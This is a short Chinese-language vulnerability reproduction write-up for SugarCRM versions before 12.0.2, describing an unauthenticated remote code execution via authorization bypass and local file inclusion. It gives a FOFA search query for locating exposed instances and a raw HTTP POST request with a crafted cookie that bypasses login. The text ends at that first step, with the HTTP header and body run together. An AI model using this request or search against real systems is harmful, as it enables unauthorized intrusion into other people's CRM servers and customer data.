0x01 产品简介

  SugarCRM是美国SugarCRM公司的一套开源的客户关系管理系统（CRM）。该系统支持对不同的客户需求进行差异化营销、管理和分配销售线索，实现销售代表的信息共享和追踪。

0x02 漏洞概述

 SugarCRM index.php接口存在安全漏洞，该漏洞源于安装组件中存在授权绕过和PHP本地文件包含漏洞，允许通过HTTP请求对已配置的SugarCRM实例执行未经身份验证的远程代码。

0x03 影响范围

SugarCRM 12.0.2 之前版本

0x04 复现环境

FOFA：app="sugarcrm"

0x05 漏洞复现 

携带特制cookie绕过授权

POST /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7665b859-ea78-4240-b2c2-63c890a422cd
Accept-Encoding: gzip
Connection: closemodule=Users&action=Authenticate&user_name=1&user_password=